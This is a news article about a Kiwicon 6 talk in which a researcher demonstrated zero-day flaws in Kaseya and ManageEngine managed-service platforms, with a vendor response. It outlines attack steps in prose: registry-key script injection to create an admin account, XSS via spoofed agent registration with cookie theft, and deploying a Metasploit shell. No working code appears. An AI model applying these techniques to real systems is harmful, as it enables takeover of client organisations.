Researcher owns blue chip managed service platforms

Powered by SC Magazine

Zero day dropped at #Kiwicon.

View larger image View larger image View larger image

See all pictures here »

A security researcher has found zero day vulnerabilities granting administrative access to managed service provider (MSP) platforms used by the likes of Ferrari, the US Air Force and government agencies.

The flaws existed in enterprise managed services providers Kaseya and ManageEngine and were revealed in a demonstration given at the Kiwicon 6 security conference in Wellington.

SC contacted the companies for comment.

Kiwicon 6 coverage

Kaseya president Mark Sutherland said the company was investigating the flaw.

"Kaseya always welcomes hearing directly from anyone who thinks they have found a hole, or have shown an exploit (as in this case), or is just worried about security of our system," Sutherland told SC.

"We take this extremely seriously and drop everything to re-mediate the problem as soon as we hear of it. Typically we get a patch out within a day or two."

The security researcher, name withheld, also described a recently-patched vulnerability in N-Central which granted similar admin access.

“If you drink the Kool-Aid, MSPs will also do you software deployment, endpoint security and backup – so if you own this, you basically can destroy an organisation from the inside-out,” he said.

In the demonstration, the researcher created an administrator account on Kaseya by injecting malicious script into a registry key used by the Kaseya user agent. This was accepted by the MSP due to a vulnerability in which it failed to properly validate its database.

"The way we inject our code is by modifying the registry key," he said to laughs from the audience followed by applause as a new admin was successfully uploaded

“It's a SaaS (Software-as-a-Service) model, so you'll be able to get plenty of shells."

The demonstration of the ManageEngine vulnerability had failed during the presentation, but researcher said the exploit worked and the vulnerability had not been patched.

It worked by spoofing agent registration in version six of the MSPCentre Plus agent.

“The agent processes a single unauthenticated GET request with no signature, nothing, and – had [the demo] worked – we would have injected our XSS (Cross Site Scripting) string, gone back to the agent console, refreshed the page which makes a call back to our cookiestealer.js, load that and post it back to the server where I'd get the cookie string and then copy the cookie into Firefox," he said.

“I would have also showed uploading a Metaspolit payload to that machine and getting back system shell because the machine manages itself – and you can just do a software deployment task to deploy the metaspolit shell to it.”

Exploiting the since patched vulnerability in N-Central required a user to be logged in but no user interaction. It targeted the agent's recovery “rescue me” function, and allowed an attacker to tunnel in.

Copyright © SC Magazine, Australia

Top Stories
Earning the right to innovate
Breaking down the barriers to innovation is a long, but rewarding process, says Bank of Queensland Group CIO, Julie Bale.
A call for timely reporting
[Blog post] Businesses need incentives to keep customer data secure.
Doubts cast on Queensland's ICT Dashboard
Opposition, former Govt CIO say it can't be trusted.
Sign up to receive iTnews email bulletins
Latest Comments
What is delaying adoption of public cloud in your organisation?

   |   View results
Lock-in concerns
Application integration concerns
Security and compliance concerns
Unreliable network infrastructure
Data sovereignty concerns
Lack of stakeholder support
Protecting on-premise IT jobs
Difficulty transitioning CapEx budget into OpEx